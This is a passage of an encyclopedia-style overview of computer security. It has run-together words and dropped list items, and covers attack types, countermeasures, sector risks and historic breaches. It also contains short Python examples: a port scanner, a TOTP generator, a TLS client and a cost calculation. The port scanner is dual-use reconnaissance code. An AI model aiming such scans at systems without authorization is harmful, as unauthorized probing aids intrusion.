It typically occurs when a user connects to a network where traffic is not secured or encrypted and sends sensitive business data to a colleague, which, when listened to by an attacker, could be exploited.[18]Data transmitted across anopen networkallows an attacker to exploit a vulnerability and intercept it via various methods. Unlikemalware, direct-access attacks, or other forms of cyber attacks, eavesdropping attacks are unlikely to negatively affect the performance of networks or devices, making them difficult to notice.[18]In fact, "the attacker does not need to have any ongoing connection to the software at all. The attacker can insert the software onto a compromised device, perhaps by direct insertion or perhaps by a virus or other malware, and then come back some time later to retrieve any data that is found or trigger the software to send the data at some determined time."[19] Using avirtual private network(VPN), which encrypts data between two points, is one of the most common forms of protection against eavesdropping. Using the best form of encryption possible for wireless networks is best practice, as well as usingHTTPSinstead of an unencryptedHTTP.[20] Programs such asCarnivoreandNarusInSighthave been used by theFederal Bureau of Investigation(FBI) and NSA to eavesdrop on the systems ofinternet service providers. Even machines that operate as a closed system (i.e., with no contact with the outside world) can be eavesdropped upon by monitoring the faintelectromagnetictransmissions generated by the hardware.TEMPESTis a specification by the NSA referring to these attacks. Malicious software (malware) is any software code or computer program "intentionally written to harm a computer system or its users."[21]Once present on a computer, it can leak sensitive details such as personal information, business information and passwords, can give control of the system to the attacker, and can corrupt or delete data permanently.[22][23] Man-in-the-middle attacks(MITM) involve a malicious attacker trying to intercept, surveil or modify communications between two parties by spoofing one or both party's identities and injecting themselves in-between.[24]Types of MITM attacks include: Surfacing in 2017, a new class of multi-vector,[25]polymorphic[26]cyber threats combine several types of attacks and change form to avoid cybersecurity controls as they spread. Multi-vector polymorphic attacks, as the name describes, are both multi-vectored and polymorphic.[27]Firstly, they are a singular attack that involves multiple methods of attack. In this sense, they are "multi-vectored (i.e. the attack can use multiple means of propagation such as via the Web, email and applications." However, they are also multi-staged, meaning that "they can infiltrate networks and move laterally inside the network."[27]The attacks can be polymorphic, meaning that the cyberattacks used such as viruses, worms or trojans "constantly change ("morph") making it nearly impossible to detect them using signature-based defences."[27] Phishingis the attempt of acquiring sensitive information such as usernames, passwords, and credit card details directly from users by deceiving the users.[28]Phishing is typically carried out byemail spoofing,instant messaging,text message, or on aphonecall. They often direct users to enter details at a fake website whoselook and feelare almost identical to the legitimate one.[29]The fake website often asks for personal information, such as login details and passwords. 
This information can then be used to gain access to the individual's real account on the real website. Preying on a victim's trust, phishing can be classified as a form of social engineering. Attackers can use creative ways to gain access to real accounts. A common scam is for attackers to send fake electronic invoices[30] to individuals showing that they recently purchased music, apps, or other items, and instructing them to click on a link if the purchases were not authorized. A more strategic type of phishing is spear-phishing, which leverages personal or organization-specific details to make the attacker appear like a trusted source. Spear-phishing attacks target specific individuals, rather than the broad net cast by phishing attempts.[31] Privilege escalation describes a situation where an attacker with some level of restricted access is able to, without authorization, elevate their privileges or access level.[32] For example, a standard computer user may be able to exploit a vulnerability in the system to gain access to restricted data, or even become root and have full unrestricted access to a system. The severity of attacks can range from attacks simply sending an unsolicited email to a ransomware attack on large amounts of data. Privilege escalation usually starts with social engineering techniques, often phishing.[32] Privilege escalation can be separated into two strategies: horizontal privilege escalation, where the attacker gains access to the accounts or resources of other users at the same privilege level, and vertical privilege escalation, where the attacker gains higher privileges on the system. Any computational system affects its environment in some form. This effect can range from electromagnetic radiation, to the residual effect on RAM cells which as a consequence makes a cold boot attack possible, to hardware implementation faults that allow access to, or guessing of, values that normally should be inaccessible. In side-channel attack scenarios, the attacker gathers such information about a system or network to infer its internal state and, as a result, access information which is assumed by the victim to be secure. The target information in a side channel can be challenging to detect due to its low amplitude when combined with other signals.[33] Social engineering, in the context of computer security, aims to convince a user to disclose secrets such as passwords, card numbers, etc. or grant physical access by, for example, impersonating a senior executive, bank, a contractor, or a customer.[34] This generally involves exploiting people's trust, and relying on their cognitive biases. A common scam involves emails sent to accounting and finance department personnel, impersonating their CEO and urgently requesting some action. One of the main techniques of social engineering is phishing. In early 2016, the FBI reported that such business email compromise (BEC) scams had cost US businesses more than $2 billion in about two years.[35] In May 2016, the Milwaukee Bucks NBA team was the victim of this type of cyber scam, with a perpetrator impersonating the team's president Peter Feigin, resulting in the handover of all the team's employees' 2015 W-2 tax forms.[36] Spoofing is an act of pretending to be a valid entity through the falsification of data (such as an IP address or username), in order to gain access to information or resources that one is otherwise unauthorized to obtain.
Spoofing is closely related tophishing.[37][38]There are several types of spoofing, including: In 2018, the cybersecurity firmTrellixpublished research on the life-threatening risk of spoofing in the healthcare industry.[40] Tamperingdescribes amalicious modificationor alteration of data. It is an intentional but unauthorized act resulting in the modification of a system, components of systems, its intended behavior, or data. So-calledEvil Maid attacksand security services planting ofsurveillancecapability into routers are examples.[41] HTMLsmuggling allows an attacker tosmugglea malicious code inside a particular HTML or web page.[42]HTMLfiles can carry payloads concealed as benign, inert data in order to defeatcontent filters. These payloads can be reconstructed on the other side of the filter.[43] When a target user opens the HTML, the malicious code is activated; the web browser thendecodesthe script, which then unleashes the malware onto the target's device.[42] Employee behavior can have a big impact oninformation securityin organizations. Cultural concepts can help different segments of the organization work effectively or work against effectiveness toward information security within an organization. Information security culture is the "...totality of patterns of behavior in an organization that contributes to the protection of information of all kinds."[44] Andersson and Reimers (2014) found that employees often do not see themselves as part of their organization's information security effort and often take actions that impede organizational changes.[45]Indeed, the Verizon Data Breach Investigations Report 2020, which examined 3,950 security breaches, discovered 30% of cybersecurity incidents involved internal actors within a company.[46]Research shows information security culture needs to be improved continuously. In "Information Security Culture from Analysis to Change", authors commented, "It's a never-ending process, a cycle of evaluation and change or maintenance." To manage the information security culture, five steps should be taken: pre-evaluation, strategic planning, operative planning, implementation, and post-evaluation.[47] In computer security, acountermeasureis an action, device, procedure or technique that reduces a threat, a vulnerability, or anattackby eliminating or preventing it, by minimizing the harm it can cause, or by discovering and reporting it so that corrective action can be taken.[48][49][50] Some common countermeasures are listed in the following sections: Security by design, or alternately secure by design, means that the software has been designed from the ground up to be secure. In this case, security is considered a main feature. 
The UK government's National Cyber Security Centre separates secure cyber design principles into five sections:[51] These design principles of security by design can include some of the following techniques: Security architecture can be defined as the "practice of designing computer systems to achieve security goals."[52]These goals have overlap with the principles of "security by design" explored above, including to "make initial compromise of the system difficult," and to "limit the impact of any compromise."[52]In practice, the role of a security architect would be to ensure the structure of a system reinforces the security of the system, and that new changes are safe and meet the security requirements of the organization.[53][54] Similarly, Techopedia defines security architecture as "a unified security design that addresses the necessities and potential risks involved in a certain scenario or environment. It also specifies when and where to apply security controls. The design process is generally reproducible." The key attributes of security architecture are:[55] Practicing security architecture provides the right foundation to systematically address business, IT and security concerns in an organization. A state of computer security is the conceptual ideal, attained by the use of three processes: threat prevention, detection, and response. These processes are based on various policies and system components, which include the following: Today, computer security consists mainly of preventive measures, likefirewallsor anexit procedure. A firewall can be defined as a way of filtering network data between a host or a network and another network, such as theInternet. They can be implemented as software running on the machine, hooking into thenetwork stack(or, in the case of mostUNIX-based operating systems such asLinux, built into the operating systemkernel) to provide real-time filtering and blocking.[56]Another implementation is a so-calledphysical firewall, which consists of a separate machine filtering network traffic. Firewalls are common amongst machines that are permanently connected to the Internet. Some organizations are turning tobig dataplatforms, such asApache Hadoop, to extend data accessibility andmachine learningto detectadvanced persistent threats.[58] In order to ensure adequate security, the confidentiality, integrity and availability of a network, better known as the CIA triad, must be protected and is considered the foundation to information security.[59]To achieve those objectives, administrative, physical and technical security measures should be employed. The amount of security afforded to an asset can only be determined when its value is known.[60] Vulnerability management is the cycle of identifying, fixing or mitigatingvulnerabilities,[61]especially in software andfirmware. Vulnerability management is integral to computer security andnetwork security. Vulnerabilities can be discovered with avulnerability scanner, which analyzes a computer system in search of known vulnerabilities,[62]such asopen ports, insecure software configuration, and susceptibility tomalware. In order for these tools to be effective, they must be kept up to date with every new update the vendor release. Typically, these updates will scan for the new vulnerabilities that were introduced recently. Beyond vulnerability scanning, many organizations contract outside security auditors to run regularpenetration testsagainst their systems to identify vulnerabilities. 
In some sectors, this is a contractual requirement.[63] The act of assessing and reducing vulnerabilities to cyber attacks is commonly referred to asinformation technology security assessments. They aim to assess systems for risk and to predict and test for their vulnerabilities. Whileformal verificationof the correctness of computer systems is possible,[64][65]it is not yet common. Operating systems formally verified includeseL4,[66]andSYSGO'sPikeOS[67][68]– but these make up a very small percentage of the market. It is possible to reduce an attacker's chances by keeping systems up to date with security patches and updates and by hiring people with expertise in security. Large companies with significant threats can hire Security Operations Centre (SOC) Analysts. These are specialists in cyber defences, with their role ranging from "conducting threat analysis to investigating reports of any new issues and preparing and testing disaster recovery plans."[69] Whilst no measures can completely guarantee the prevention of an attack, these measures can help mitigate the damage of possible attacks. The effects of data loss/damage can be also reduced by carefulbacking upandinsurance. Outside of formal assessments, there are various methods of reducing vulnerabilities.Two factor authenticationis a method for mitigating unauthorized access to a system or sensitive information.[70]It requiressomething you know:a password or PIN, andsomething you have: a card, dongle, cellphone, or another piece of hardware. This increases security as an unauthorized person needs both of these to gain access. Protecting against social engineering and direct computer access (physical) attacks can only happen by non-computer means, which can be difficult to enforce, relative to the sensitivity of the information. Training is often involved to help mitigate this risk by improving people's knowledge of how to protect themselves and by increasing people's awareness of threats.[71]However, even in highly disciplined environments (e.g. military organizations), social engineering attacks can still be difficult to foresee and prevent. Inoculation, derived frominoculation theory, seeks to prevent social engineering and other fraudulent tricks and traps by instilling a resistance to persuasion attempts through exposure to similar or related attempts.[72] Hardware-based or assisted computer security also offers an alternative to software-only computer security. Using devices and methods such asdongles,trusted platform modules, intrusion-aware cases, drive locks, disabling USB ports, and mobile-enabled access may be considered more secure due to the physical access (or sophisticated backdoor access) required in order to be compromised. Each of these is covered in more detail below. One use of the termcomputer securityrefers to technology that is used to implementsecure operating systems. Using secure operating systems is a good way of ensuring computer security. These are systems that have achieved certification from an external security-auditing organization, the most popular evaluations areCommon Criteria(CC).[86] In software engineering,secure codingaims to guard against the accidental introduction of security vulnerabilities. It is also possible to create software designed from the ground up to be secure. Such systems aresecure by design. Beyond this, formal verification aims to prove thecorrectnessof thealgorithmsunderlying a system;[87]important forcryptographic protocolsfor example. 
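The vulnerability scanners described above can be elaborate commercial or open-source products, but their most basic building block is easy to sketch. The following Python sketch simply probes a host for open TCP ports, which is the first step a scanner performs before fingerprinting services and matching versions against databases of known flaws; the host and port list are arbitrary examples, and such probes should only ever be aimed at systems one is authorized to test.

```python
# A minimal sketch of the simplest kind of check a vulnerability scanner
# performs: probing a host for open TCP ports. Real scanners go much further,
# fingerprinting services and matching versions against vulnerability
# databases; this only illustrates the first step.
import socket

COMMON_PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 80: "http", 443: "https", 3389: "rdp"}

def scan_host(host: str, timeout: float = 0.5) -> dict:
    """Return a mapping of port -> True if a TCP connection succeeded."""
    results = {}
    for port in COMMON_PORTS:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            results[port] = sock.connect_ex((host, port)) == 0
    return results

if __name__ == "__main__":
    for port, is_open in scan_host("127.0.0.1").items():
        state = "open" if is_open else "closed/filtered"
        print(f"{port:>5} ({COMMON_PORTS[port]}): {state}")
```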
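Two-factor authentication, as described above, commonly pairs a password (something you know) with a time-based one-time password (TOTP) generated by a device the user carries (something you have). The sketch below shows the standard TOTP construction, an HMAC over a 30-second time counter as used by common authenticator apps; the Base32 secret is a made-up example, and a production system would use a vetted library rather than hand-rolled code.

```python
# A minimal sketch of TOTP (RFC 6238): the server and the user's device derive
# the same short-lived code from a shared secret and the current time.
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32, casefold=True)        # shared secret
    counter = int(time.time()) // interval                   # current time step
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                                # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

if __name__ == "__main__":
    # "JBSWY3DPEHPK3PXP" is a made-up demo secret, not a real credential.
    print("current one-time code:", totp("JBSWY3DPEHPK3PXP"))
```

Because only the holder of the secret-bearing device can produce the current code, a stolen password alone is not enough to gain access.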
Within computer systems, two of the mainsecurity modelscapable of enforcing privilege separation areaccess control lists(ACLs) androle-based access control(RBAC). Anaccess-control list(ACL), with respect to a computer file system, is a list of permissions associated with an object. An ACL specifies which users or system processes are granted access to objects, as well as what operations are allowed on given objects. Role-based access control is an approach to restricting system access to authorized users,[88][89][90]used by the majority of enterprises with more than 500 employees,[91]and can implementmandatory access control(MAC) ordiscretionary access control(DAC). A further approach,capability-based securityhas been mostly restricted to research operating systems. Capabilities can, however, also be implemented at the language level, leading to a style of programming that is essentially a refinement of standard object-oriented design. An open-source project in the area is theE language. The end-user is widely recognized as the weakest link in the security chain[92]and it is estimated that more than 90% of security incidents and breaches involve some kind of human error.[93][94]Among the most commonly recorded forms of errors and misjudgment are poor password management, sending emails containing sensitive data and attachments to the wrong recipient, the inability to recognize misleading URLs and to identify fake websites and dangerous email attachments. A common mistake that users make is saving their user id/password in their browsers to make it easier to log in to banking sites. This is a gift to attackers who have obtained access to a machine by some means. The risk may be mitigated by the use of two-factor authentication.[95] As the human component of cyber risk is particularly relevant in determining the global cyber risk[96]an organization is facing, security awareness training, at all levels, not only provides formal compliance with regulatory and industry mandates but is considered essential[97]in reducing cyber risk and protecting individuals and companies from the great majority of cyber threats. The focus on the end-user represents a profound cultural change for many security practitioners, who have traditionally approached cybersecurity exclusively from a technical perspective, and moves along the lines suggested by major security centers[98]to develop a culture of cyber awareness within the organization, recognizing that a security-aware user provides an important line of defense against cyber attacks. Related to end-user training,digital hygieneorcyber hygieneis a fundamental principle relating to information security and, as the analogy withpersonal hygieneshows, is the equivalent of establishing simple routine measures to minimize the risks from cyber threats. 
The assumption is that good cyber hygiene practices can give networked users another layer of protection, reducing the risk that one vulnerable node will be used to either mount attacks or compromise another node or network, especially from common cyberattacks.[99] Cyber hygiene should also not be mistaken for proactive cyber defence, a military term.[100] The most common acts of digital hygiene include updating malware protection, cloud back-ups, and passwords, and ensuring restricted admin rights and network firewalls.[101] As opposed to a purely technology-based defense against threats, cyber hygiene mostly concerns routine measures that are technically simple to implement and mostly dependent on discipline[102] or education.[103] It can be thought of as an abstract list of tips or measures that have been demonstrated to have a positive effect on personal or collective digital security. As such, these measures can be performed by laypeople, not just security experts. Cyber hygiene relates to personal hygiene as computer viruses relate to biological viruses (or pathogens). However, while the term computer virus was coined almost simultaneously with the creation of the first working computer viruses,[104] the term cyber hygiene is a much later invention, perhaps as late as 2000[105] by Internet pioneer Vint Cerf. It has since been adopted by the Congress[106] and Senate of the United States,[107] the FBI,[108] EU institutions[99] and heads of state.[100] Responding to attempted security breaches is often very difficult for a variety of reasons, including: Where an attack succeeds and a breach occurs, many jurisdictions now have in place mandatory security breach notification laws. The growth in the number of computer systems and the increasing reliance upon them by individuals, businesses, industries, and governments means that there are an increasing number of systems at risk. The computer systems of financial regulators and financial institutions like the U.S. Securities and Exchange Commission, SWIFT, investment banks, and commercial banks are prominent hacking targets for cybercriminals interested in manipulating markets and making illicit gains.[109] Websites and apps that accept or store credit card numbers, brokerage accounts, and bank account information are also prominent hacking targets, because of the potential for immediate financial gain from transferring money, making purchases, or selling the information on the black market.[110] In-store payment systems and ATMs have also been tampered with in order to gather customer account data and PINs. The UCLA Internet Report: Surveying the Digital Future (2000) found that the privacy of personal data created barriers to online sales and that more than nine out of 10 internet users were somewhat or very concerned about credit card security.[111] The most common web technologies for improving security between browsers and websites are SSL (Secure Sockets Layer) and its successor TLS (Transport Layer Security); together with identity management, authentication, and domain name services, these allow companies and consumers to engage in secure communications and commerce. Several versions of SSL and TLS are commonly used today in applications such as web browsing, e-mail, internet faxing, instant messaging, and VoIP (voice-over-IP). There are various interoperable implementations of these technologies, including at least one implementation that is open source. Open source allows anyone to view the application's source code, and look for and report vulnerabilities.
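To make the role of TLS concrete, the sketch below opens an encrypted connection using Python's standard ssl module; example.org is only a placeholder host. The default context verifies the server's certificate and hostname against the system trust store, which is what protects the session against eavesdropping and straightforward man-in-the-middle interception. This is an illustrative sketch, not a description of any particular implementation mentioned above.

```python
# A minimal sketch of an application-level TLS client: the connection is
# encrypted and the server certificate is validated, defeating simple
# eavesdropping and many man-in-the-middle attempts. "example.org" is a
# placeholder host.
import socket
import ssl

context = ssl.create_default_context()            # verifies certificates and hostnames by default
context.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse legacy SSL/early-TLS versions

with socket.create_connection(("example.org", 443), timeout=5) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname="example.org") as tls_sock:
        print("negotiated:", tls_sock.version(), tls_sock.cipher()[0])
        tls_sock.sendall(b"HEAD / HTTP/1.1\r\nHost: example.org\r\nConnection: close\r\n\r\n")
        print(tls_sock.recv(200).decode(errors="replace"))
```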
The credit card companiesVisaandMasterCardcooperated to develop the secureEMVchip which is embedded in credit cards. Further developments include theChip Authentication Programwhere banks give customers hand-held card readers to perform online secure transactions. Other developments in this arena include the development of technology such as Instant Issuance which has enabled shoppingmall kiosksacting on behalf of banks to issue on-the-spot credit cards to interested customers. Computers control functions at many utilities, including coordination oftelecommunications, thepower grid,nuclear power plants, and valve opening and closing in water and gas networks. The Internet is a potential attack vector for such machines if connected, but theStuxnetworm demonstrated that even equipment controlled by computers not connected to the Internet can be vulnerable. In 2014, theComputer Emergency Readiness Team, a division of theDepartment of Homeland Security, investigated 79 hacking incidents at energy companies.[112] Theaviationindustry is very reliant on a series of complex systems which could be attacked.[113]A simple power outage at one airport can cause repercussions worldwide,[114]much of the system relies on radio transmissions which could be disrupted,[115]and controlling aircraft over oceans is especially dangerous because radar surveillance only extends 175 to 225 miles offshore.[116]There is also potential for attack from within an aircraft.[117] Implementing fixes in aerospace systems poses a unique challenge because efficient air transportation is heavily affected by weight and volume. Improving security by adding physical devices to airplanes could increase their unloaded weight, and could potentially reduce cargo or passenger capacity.[118] In Europe, with the (Pan-European Network Service)[119]and NewPENS,[120]and in the US with the NextGen program,[121]air navigation service providersare moving to create their own dedicated networks. Many modern passports are nowbiometric passports, containing an embeddedmicrochipthat stores a digitized photograph and personal information such as name, gender, and date of birth. In addition, more countries[which?]are introducingfacial recognition technologyto reduceidentity-related fraud. The introduction of the ePassport has assisted border officials in verifying the identity of the passport holder, thus allowing for quick passenger processing.[122]Plans are under way in the US, theUK, andAustraliato introduce SmartGate kiosks with both retina andfingerprint recognitiontechnology.[123]The airline industry is moving from the use of traditional paper tickets towards the use ofelectronic tickets(e-tickets). These have been made possible by advances in online credit card transactions in partnership with the airlines. Long-distance bus companies[which?]are also switching over to e-ticketing transactions today. The consequences of a successful attack range from loss of confidentiality to loss of system integrity,air traffic controloutages, loss of aircraft, and even loss of life. Desktop computers and laptops are commonly targeted to gather passwords or financial account information or to construct a botnet to attack another target.Smartphones,tablet computers,smart watches, and othermobile devicessuch asquantified selfdevices likeactivity trackershave sensors such as cameras, microphones, GPS receivers, compasses, andaccelerometerswhich could be exploited, and may collect personal information, including sensitive health information. 
WiFi, Bluetooth, and cell phone networks on any of these devices could be used as attack vectors, and sensors might be remotely activated after a successful breach.[124] The increasing number ofhome automationdevices such as theNest thermostatare also potential targets.[124] Today many healthcare providers andhealth insurancecompanies use the internet to provide enhanced products and services. Examples are the use oftele-healthto potentially offer better quality and access to healthcare, or fitness trackers to lower insurance premiums.[citation needed]Patient records are increasingly being placed on secure in-house networks, alleviating the need for extra storage space.[125] Large corporations are common targets. In many cases attacks are aimed at financial gain throughidentity theftand involvedata breaches. Examples include the loss of millions of clients' credit card and financial details byHome Depot,[126]Staples,[127]Target Corporation,[128]andEquifax.[129] Medical records have been targeted in general identify theft, health insurance fraud, and impersonating patients to obtain prescription drugs for recreational purposes or resale.[130]Although cyber threats continue to increase, 62% of all organizations did not increase security training for their business in 2015.[131] Not all attacks are financially motivated, however: security firmHBGary Federalhad a serious series of attacks in 2011 fromhacktivistgroupAnonymousin retaliation for the firm's CEO claiming to have infiltrated their group,[132][133]andSony Pictureswashacked in 2014with the apparent dual motive of embarrassing the company through data leaks and crippling the company by wiping workstations and servers.[134][135] Vehicles are increasingly computerized, with engine timing,cruise control,anti-lock brakes, seat belt tensioners, door locks,airbagsandadvanced driver-assistance systemson many models. Additionally,connected carsmay use WiFi and Bluetooth to communicate with onboard consumer devices and the cell phone network.[136]Self-driving carsare expected to be even more complex. All of these systems carry some security risks, and such issues have gained wide attention.[137][138][139] Simple examples of risk include a maliciouscompact discbeing used as an attack vector,[140]and the car's onboard microphones being used for eavesdropping. However, if access is gained to a car's internalcontroller area network, the danger is much greater[136]– and in a widely publicized 2015 test, hackers remotely carjacked a vehicle from 10 miles away and drove it into a ditch.[141][142] Manufacturers are reacting in numerous ways, withTeslain 2016 pushing out some security fixesover the airinto its cars' computer systems.[143]In the area of autonomous vehicles, in September 2016 theUnited States Department of Transportationannounced some initial safety standards, and called for states to come up with uniform policies.[144][145][146] Additionally, e-Drivers' licenses are being developed using the same technology. For example, Mexico's licensing authority (ICV) has used a smart card platform to issue the first e-Drivers' licenses to the city ofMonterrey, in the state ofNuevo León.[147] Shipping companies[148]have adoptedRFID(Radio Frequency Identification) technology as an efficient, digitally secure,tracking device. Unlike abarcode, RFID can be read up to 20 feet away. 
RFID is used byFedEx[149]andUPS.[150] Government andmilitarycomputer systems are commonly attacked by activists[151][152][153]and foreign powers.[154][155][156][157]Local and regional government infrastructure such astraffic lightcontrols, police and intelligence agency communications,personnel records, as well as student records.[158] TheFBI,CIA, andPentagon, all utilize secure controlled access technology for any of their buildings. However, the use of this form of technology is spreading into the entrepreneurial world. More and more companies are taking advantage of the development of digitally secure controlled access technology. GE's ACUVision, for example, offers a single panel platform for access control, alarm monitoring and digital recording.[159] TheInternet of things(IoT) is the network of physical objects such as devices, vehicles, and buildings that areembeddedwithelectronics,software,sensors, andnetwork connectivitythat enables them to collect and exchange data.[160]Concerns have been raised that this is being developed without appropriate consideration of the security challenges involved.[161][162] While the IoT creates opportunities for more direct integration of the physical world into computer-based systems,[163][164]it also provides opportunities for misuse. In particular, as the Internet of Things spreads widely, cyberattacks are likely to become an increasingly physical (rather than simply virtual) threat.[165]If a front door's lock is connected to the Internet, and can be locked/unlocked from a phone, then a criminal could enter the home at the press of a button from a stolen or hacked phone. People could stand to lose much more than their credit card numbers in a world controlled by IoT-enabled devices. Thieves have also used electronic means to circumvent non-Internet-connected hotel door locks.[166] An attack aimed at physical infrastructure or human lives is often called a cyber-kinetic attack. As IoT devices and appliances become more widespread, the prevalence and potential damage of cyber-kinetic attacks can increase substantially. Medical deviceshave either been successfully attacked or had potentially deadly vulnerabilities demonstrated, including both in-hospital diagnostic equipment[167]and implanted devices includingpacemakers[168]andinsulin pumps.[169]There are many reports of hospitals and hospital organizations getting hacked, includingransomwareattacks,[170][171][172][173]Windows XPexploits,[174][175]viruses,[176][177]and data breaches of sensitive data stored on hospital servers.[178][171][179][180]On 28 December 2016 the USFood and Drug Administrationreleased its recommendations for how medicaldevice manufacturersshould maintain the security of Internet-connected devices – but no structure for enforcement.[181][182] In distributed generation systems, the risk of a cyber attack is real, according toDaily Energy Insider. An attack could cause a loss of power in a large area for a long period of time, and such an attack could have just as severe consequences as a natural disaster. The District of Columbia is considering creating a Distributed Energy Resources (DER) Authority within the city, with the goal being for customers to have more insight into their own energy use and giving the local electric utility,Pepco, the chance to better estimate energy demand. The D.C. 
proposal, however, would "allow third-party vendors to create numerous points of energy distribution, which could potentially create more opportunities for cyber attackers to threaten the electric grid."[183] Perhaps the most widely known digitally secure telecommunication device is the SIM (Subscriber Identity Module) card, a device that is embedded in most of the world's cellular devices before any service can be obtained. The SIM card is just the beginning of this digitally secure environment. The Smart Card Web Servers draft standard (SCWS) defines the interfaces to an HTTP server in a smart card.[184] Tests are being conducted to secure OTA ("over-the-air") payment and credit card information from and to a mobile phone. Combination SIM/DVD devices are being developed through Smart Video Card technology, which embeds a DVD-compliant optical disc into the card body of a regular SIM card. Other telecommunication developments involving digital security include mobile signatures, which use the embedded SIM card to generate a legally binding electronic signature. Serious financial damage has been caused by security breaches, but because there is no standard model for estimating the cost of an incident, the only data available is that which is made public by the organizations involved. "Several computer security consulting firms produce estimates of total worldwide losses attributable to virus and worm attacks and to hostile digital acts in general. The 2003 loss estimates by these firms range from $13 billion (worms and viruses only) to $226 billion (for all forms of covert attacks). The reliability of these estimates is often challenged; the underlying methodology is basically anecdotal."[185] However, reasonable estimates of the financial cost of security breaches can actually help organizations make rational investment decisions. According to the classic Gordon-Loeb Model analyzing the optimal investment level in information security, one can conclude that the amount a firm spends to protect information should generally be only a small fraction of the expected loss (i.e., the expected value of the loss resulting from a cyber/information security breach).[186] As with physical security, the motivations for breaches of computer security vary between attackers. Some are thrill-seekers or vandals, some are activists, others are criminals looking for financial gain. State-sponsored attackers are now common and well resourced, but the field started with amateurs such as Markus Hess, who hacked for the KGB, as recounted by Clifford Stoll in The Cuckoo's Egg. Attackers' motivations can vary for all types of attacks, from pleasure to political goals.[15] For example, hacktivists may target a company or organization that carries out activities they do not agree with, aiming to create bad publicity for the company by crashing its website. High-capability hackers, often with larger backing or state sponsorship, may attack based on the demands of their financial backers. Such attackers are more likely to attempt more serious attacks.
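The Gordon-Loeb result mentioned above can be illustrated with a rough calculation. A well-known corollary of the model is that the optimal amount to spend protecting an information set does not exceed 1/e (roughly 37%) of the expected loss from a breach; the figures in the sketch below are invented purely for illustration.

```python
# A rough sketch of the Gordon-Loeb reasoning mentioned above. The inputs are
# invented illustrative figures: the point is only that optimal security
# spending is bounded by a fraction (1/e, about 37%) of the expected loss,
# not by the potential loss itself.
import math

potential_loss = 2_000_000   # monetary loss if the information set is breached
threat_prob    = 0.25        # chance the asset is attacked in the period
vulnerability  = 0.40        # chance an attack succeeds with no extra investment

expected_loss = potential_loss * threat_prob * vulnerability
investment_cap = expected_loss / math.e   # Gordon-Loeb upper bound on optimal spend

print(f"expected loss:      ${expected_loss:,.0f}")
print(f"spend no more than: ${investment_cap:,.0f}  (~{100 / math.e:.0f}% of expected loss)")
```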
One example of such a serious attack was the 2015 Ukraine power grid hack, which reportedly combined spear-phishing, destruction of files, and denial-of-service attacks to carry out the full attack.[187][188] Additionally, recent attacker motivations can be traced back to extremist organizations seeking to gain political advantage or disrupt social agendas.[189] The growth of the internet, mobile technologies, and inexpensive computing devices has led to a rise in capabilities but also to greater risk to environments that are deemed vital to operations. All critical targeted environments are susceptible to compromise, and this has led to a series of proactive studies on how to mitigate the risk by taking into consideration the motivations of these types of actors. Several stark differences exist between the hacker motivation and that of nation state actors seeking to attack based on an ideological preference.[190] A key aspect of threat modeling for any system is identifying the motivations behind potential attacks and the individuals or groups likely to carry them out. The level and detail of security measures will differ based on the specific system being protected. For instance, a home personal computer, a bank, and a classified military network each face distinct threats, despite using similar underlying technologies.[191] Computer security incident management is an organized approach to addressing and managing the aftermath of a computer security incident or compromise with the goal of preventing a breach or thwarting a cyberattack. An incident that is not identified and managed at the time of intrusion typically escalates to a more damaging event such as a data breach or system failure. The intended outcome of a computer security incident response plan is to contain the incident, limit damage and assist recovery to business as usual. Responding to compromises quickly can mitigate exploited vulnerabilities, restore services and processes and minimize losses.[192] Incident response planning allows an organization to establish a series of best practices to stop an intrusion before it causes damage. Typical incident response plans contain a set of written instructions that outline the organization's response to a cyberattack. Without a documented plan in place, an organization may not successfully detect an intrusion or compromise, and stakeholders may not understand their roles, processes and procedures during an escalation, slowing the organization's response and resolution. There are four key components of a computer security incident response plan: Some illustrative examples of different types of computer security breaches are given below. In 1988, 60,000 computers were connected to the Internet, and most were mainframes, minicomputers and professional workstations. On 2 November 1988, many started to slow down, because they were running malicious code that demanded processor time and that spread itself to other computers – the first internet computer worm.[194] The software was traced back to 23-year-old Cornell University graduate student Robert Tappan Morris, who said "he wanted to count how many machines were connected to the Internet".[194] In 1994, over a hundred intrusions were made by unidentified crackers into the Rome Laboratory, the US Air Force's main command and research facility. Using trojan horses, hackers were able to obtain unrestricted access to Rome's networking systems and remove traces of their activities.
The intruders were able to obtain classified files, such as air tasking order systems data, and were furthermore able to penetrate connected networks of the National Aeronautics and Space Administration's Goddard Space Flight Center, Wright-Patterson Air Force Base, some Defense contractors, and other private sector organizations, by posing as a trusted Rome center user.[195] In early 2007, American apparel and home goods company TJX announced that it was the victim of an unauthorized computer systems intrusion[196] and that the hackers had accessed a system that stored data on credit card, debit card, check, and merchandise return transactions.[197] In 2010, the computer worm known as Stuxnet reportedly ruined almost one-fifth of Iran's nuclear centrifuges.[198] It did so by disrupting industrial programmable logic controllers (PLCs) in a targeted attack. This is generally believed to have been launched by Israel and the United States to disrupt Iran's nuclear program[199][200][201][202] – although neither has publicly admitted this. In early 2013, documents provided by Edward Snowden were published by The Washington Post and The Guardian,[203][204] exposing the massive scale of NSA global surveillance. There were also indications that the NSA may have inserted a backdoor in a NIST standard for encryption.[205] This standard was later withdrawn due to widespread criticism.[206] The NSA was additionally revealed to have tapped the links between Google's data centers.[207] A Ukrainian hacker known as Rescator broke into Target Corporation computers in 2013, stealing roughly 40 million credit card numbers,[208] and then Home Depot computers in 2014, stealing between 53 and 56 million credit card numbers.[209] Warnings were delivered at both corporations, but were ignored; physical security breaches using self checkout machines are believed to have played a large role. "The malware utilized is absolutely unsophisticated and uninteresting," says Jim Walter, director of threat intelligence operations at security technology company McAfee – meaning that the heists could have easily been stopped by existing antivirus software had administrators responded to the warnings. The size of the thefts resulted in major attention from state and federal United States authorities, and the investigation is ongoing. In April 2015, the Office of Personnel Management discovered it had been hacked more than a year earlier in a data breach, resulting in the theft of approximately 21.5 million personnel records handled by the office.[210] The Office of Personnel Management hack has been described by federal officials as among the largest breaches of government data in the history of the United States.[211] Data 